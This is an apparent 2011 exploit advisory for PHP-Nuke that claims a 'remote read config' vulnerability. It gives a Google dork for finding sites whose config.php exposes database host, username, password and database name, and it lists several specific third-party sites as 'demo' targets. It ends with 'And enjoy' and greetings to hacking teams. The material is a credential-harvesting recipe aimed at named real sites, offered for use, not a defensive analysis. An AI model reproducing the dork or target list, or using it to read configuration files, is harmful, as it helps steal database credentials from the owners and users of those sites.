# Exploit Title:PHP-NUKE remote read config Vulnerability # Date: 6/6/2011 # Author: Angel Injection # home Page: http://www.club-h.co.cc # Email: Angel-Injection[at]hotmail.com # Vendor or Software Link:http://phpnuke.org # Version: n/a # Category:: webapps # Google dork:inurl:config.php dbuname dbpass intext:"PHP-NUKE" # Tested on: Linux Back Track 5 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> # Demo site: http://nelsem.by.ru/config.php http://home.arcor.de/only88/config.php school47-forum.on.ufanet.ru/config.php http://sagv.gyakg.u-szeged.hu/tanar/birozsol/CONFIG.PHP In File Config.php We Have 1-dbhost 2-dbuname 3-dbpass 4-dbname And enjoy -- ------ ---------- ----------- ------- ------------- ------- --------- ------ ---- Greetz To :1337day Team Thanks to all the people of Iraq And Club Hack Team